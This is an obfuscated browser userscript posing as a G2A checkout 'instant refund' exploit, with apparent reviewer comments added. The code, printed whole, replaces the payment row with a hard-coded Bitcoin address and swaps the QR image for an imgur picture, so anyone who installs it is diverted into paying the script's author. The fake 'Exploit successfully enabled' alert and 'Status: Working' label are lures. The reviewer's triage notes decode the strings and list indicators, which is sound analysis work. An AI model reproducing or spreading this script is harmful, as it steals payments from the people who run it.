// ==UserScript==
// @name G2A Script
// @namespace Bounty
// @version 9.0
// @description G2A Instant Refund Vulnerbility
// @author @Die
// @match https://checkout.pay.g2a.com/*
// @grant none
// ==/UserScript==

// Analysis notes (reviewer):
// - The metadata block above scopes the script to checkout.pay.g2a.com and advertises a
//   "refund" exploit. Nothing in the code below contacts a backend or requests a refund.
// - The only page changes are two overwrites made from a timer: the content of the second
//   element with class "row" is replaced by a hard-coded BTC address string, and the `src`
//   of the first element with class "code" is replaced by a hard-coded image URL.
// - NOTE(review): on this checkout page these presumably are the payment-address row and
//   its QR image, which would make the script a payment-destination swap aimed at the
//   person who installs it. Confirm against the live page markup.
// - Triage indicators: the `_0x…` identifiers, the string-lookup array and the `\xNN`
//   escapes are typical obfuscator output. The decoded address and URL below are the IoCs.

// String table; every property name and literal used below is looked up by index.
var _0x128a= [
  "\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E", // [0] "Exploit successfully enabled! Press OK to continue."
  "row", // [1] class name of the overwritten text container
  "getElementsByClassName", // [2] DOM lookup method
  "innerHTML", // [3] property written on the second "row" element
  "\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x33\x34\x6B\x72\x51\x61\x77\x36\x66\x68\x42\x6F\x65\x71\x6E\x35\x42\x6D\x62\x66\x46\x6D\x35\x37\x69\x4E\x6E\x5A\x31\x67\x76\x50\x71\x6F", // [4] "BTC address: 34krQaw6fhBoeqn5BmbfFm57iNnZ1gvPqo"
  "src", // [5] property written on the first "code" element
  "code", // [6] class name of the overwritten image element
  "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x66\x4B\x4C\x4A\x4A\x4B\x52\x2E\x70\x6E\x67", // [7] "https://i.imgur.com/fKLJJKR.png"
  "length" // [8] used for the stop condition
];

// Shows the decoded message [0]; purely cosmetic, no state is changed by it.
alert(_0x128a[0]);

// Poll every 10 ms. While the target elements are missing, the property writes below throw
// inside the callback and the timer keeps firing, so the overwrite is retried until it works.
var _0x4892da=setInterval(function() {
  // document.getElementsByClassName("row")
  var _0xf782x2=document[_0x128a[2]](_0x128a[1]);
  // rows[1].innerHTML = "BTC address: …" (replaces whatever the page rendered there)
  _0xf782x2[1][_0x128a[3]]= _0x128a[4];
  // document.getElementsByClassName("code")[0].src = hard-coded image URL
  document[_0x128a[2]](_0x128a[6])[0] [_0x128a[5]]= _0x128a[7];
  // Re-query the "code" elements; this line is reached only after both writes succeeded.
  var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
  // codes.length > 0 -> stop polling; the swapped values stay in the DOM.
  if(_0xf782x3[_0x128a[8]]> 0) {
    clearInterval(_0x4892da)
  }
} ,10) //Backend-Exploit | Status: Working
// NOTE(review): the trailing label above is the author's claim; the code only edits the local DOM.